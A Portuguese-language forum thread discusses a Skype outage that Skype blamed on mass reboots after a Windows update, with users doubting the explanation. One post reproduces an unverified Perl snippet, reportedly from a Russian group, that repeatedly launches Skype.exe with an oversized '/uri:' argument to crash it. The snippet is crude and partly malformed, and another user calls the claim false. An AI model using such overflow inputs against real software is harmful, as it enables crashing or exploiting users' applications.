• Revista PROGRAMAR: Já está disponível a edição #53 da revista programar. Faz já o download aqui!

Rui Carlos

A raiz do "apagão" Skype

14 mensagens neste tópico

A falha no serviço que impediu milhões de utilizadores Skype de usar o popular serviço de VoIP no passado dia 16, deveu-se a uma actualização do Windows.

Segundo a Skype, o “apagão” na rede aconteceu quando um número anormalmente alto de computadores reiniciou, depois de uma actualização de segurança do Windows. Isto causou uma “avalanche” de pedidos de log-in, o que afectou a capacidade da rede de dar resposta aos utilizadores.

Esta falha na rede Skype começou na passada quinta-feira e acabou no sábado, impedindo milhões de utilizadores de se ligarem à rede para efectuar telefonemas ou enviar SMS. A empresa tem mais de 220 milhões de utilizadores, dos quais cinco a seis milhões estão on-line num dado momento.

http://exameinformatica.clix.pt/noticias/internet/215964.html

como sempre, o culpado tinha de ser o windows :P

cada vez tenho mais reservas relativamente ao software e aos serviços que o Skype oferece...

0

Partilhar esta mensagem

Link para a mensagem
Partilhar noutros sites

Epa isto é mesmo daquelas histórias que se são verdadeiras, são mesmo absurdas... como é que uma empresa com esta dimensão deixa que uma coisa destas aconteça? :eek:

0

Partilhar esta mensagem

Link para a mensagem
Partilhar noutros sites

enfim..inadmissível numa empresa desta envergadura...  :mad: :wallbash:

0

Partilhar esta mensagem

Link para a mensagem
Partilhar noutros sites

Wow, computadores que reiniciam todos ao mesmo tempo, loadam ao mesmo tempo, transferem as actualizações ao mesmo tempo, e fazem login ao mesmo tempo!

0

Partilhar esta mensagem

Link para a mensagem
Partilhar noutros sites

Parece-me mais uma desculpa de mau administrador, se tinham de reiniciar organizassem de modo a não causar incómodos...

Parece-me que não percebeste. Não foram os serviços do Skype que reiniciaram, foram os utilizadores que com as actualizações do Windows reiniciaram os PCs e isso provocou muitos logins simultâneos.

Esta que sirva de emenda para limitarem o nº de utilizadores que façam login simultâneamente ou algo do género.

0

Partilhar esta mensagem

Link para a mensagem
Partilhar noutros sites

for ($i=256; $i>xCCCCC; $i=$i+256)
{ 
$eot='AAAA' x $i; 
call_sp(); 
} 
exit; 

sub call_sp()
{ 
$str="\"C:\\Program Files\\Skype\\Phone\\Skype.exe\" \"/uri:$eot\""; 
system("$str");
}

esse é o código em perl q , segundo o site russo do grupo q comandou o apagão, explorou a falha.

como não entendo bulhufas nem de perl, nem de russo. não posso confirmar esta informação q foi (re)passada por um blog, caso alguém entenda esta linguagem de programação explique o código. :P

0

Partilhar esta mensagem

Link para a mensagem
Partilhar noutros sites

Isto ñão faz sentido nenhum. Não estou a perceber nada disto.

Como é que os updates são feitos AO MESMO TEMPO em milhares/milhões de utilizadores?

Isto só teria sentido se fosse nos servidores da skype a reiniciarem  ao mesmo tempo e as sessões serem iniciadas após reboot!

0

Partilhar esta mensagem

Link para a mensagem
Partilhar noutros sites

Dizem que isso dos Russos é falso, mas também, tal como o Gurzi me parece muito pouco plausível que os updates fossem feitos, nem que seja por um milhão de utilizadores no mundo, exactamente ao mesmo tempo.

0

Partilhar esta mensagem

Link para a mensagem
Partilhar noutros sites

como dizem em algumas regiões do brasil, 'tem caroço nesse angu'

0

Partilhar esta mensagem

Link para a mensagem
Partilhar noutros sites

Basta ter os Updates Automáticos ligados...

Basta? E não é preciso os pc's estarem ligados? Terem a mesma velocidade de transferência? Terem a mesma velocidade de instalação? Terem todos os utilizadores escolhido "reiniciar Agora" e não adiado um pouco mais? Terem iniciado ao mesmo tempo? Terem feito o login ao mesmo tempo abrindo o skipe ao mesmo tempo?

Parece-me que há too much variables...

0

Partilhar esta mensagem

Link para a mensagem
Partilhar noutros sites

Eu acho q tem bastante lógica até... é normal estes sistemas condicionarem quando existe um exagero de carga.

No IST temos o serviço Fenix (tipo uma secretária online) e durante o ano aguenta bem com os utilizadores, mas na altura das inscrições (e mesmo adicionando mais computadores) aquilo congela...

No que toca ao skype se o login demorar algo e houver mtos logins diferenciados por pouco tempo é normal dar bronca.

Se todos os users de Portugal ligassem o msn no mesmo minuto deveria ser o suficiente para dar bronca! Os sistemas são feitos para funcionarem em condições normais (que se registam no dia-a-dia) e não para estes casos "raros".

0

Partilhar esta mensagem

Link para a mensagem
Partilhar noutros sites

segundo meu windows update não houve nenhum update no dia 16, mas sim no dia 15. não sei no de vcs, mas aqui foi dia 15. tá estranha essa história...  :thumbdown:

0

Partilhar esta mensagem

Link para a mensagem
Partilhar noutros sites

Crie uma conta ou ligue-se para comentar

Só membros podem comentar

Criar nova conta

Registe para ter uma conta na nossa comunidade. É fácil!

Registar nova conta

Entra

Já tem conta? Inicie sessão aqui.

Entrar Agora